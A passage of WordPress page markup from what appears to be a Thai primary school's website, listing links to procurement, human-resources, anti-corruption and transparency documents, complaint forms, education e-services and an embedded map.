data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" 